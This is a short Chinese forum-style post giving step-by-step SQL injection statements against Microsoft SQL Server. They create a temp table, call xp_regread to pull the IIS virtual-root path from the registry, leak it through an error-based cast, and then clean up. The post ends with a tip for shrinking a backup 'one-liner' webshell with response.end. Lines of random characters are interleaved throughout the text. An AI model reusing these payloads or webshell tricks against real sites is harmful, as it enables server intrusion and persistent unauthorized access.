DB权限暴出网站物理路径代码

admin

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
6 ?: U3 c* P0 Z+ n: k- H
8 ^/ i2 L( U* x4 W8 P; Q; E
/ K7 K3 i5 F  U! ^2 y( A　　2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中

3 A8 ~  {3 q' ^2 R* Y* M
　　3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
  z  l% }- b' u/ @1 a9 N9 @7 E, y$ u& a
3 u: c8 E, n: P) j0 E' v$ r* l( L
　　4、drop table [jm_tmp]-- 删除此表。

# C! e: A+ f* Z3 h) g. h  z
另附上备分专用一句话
0 P4 s4 N* _! s' s/ v$ i3 b　　加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
/ q2 \2 }: b, ^$ o/ E4 x; K. B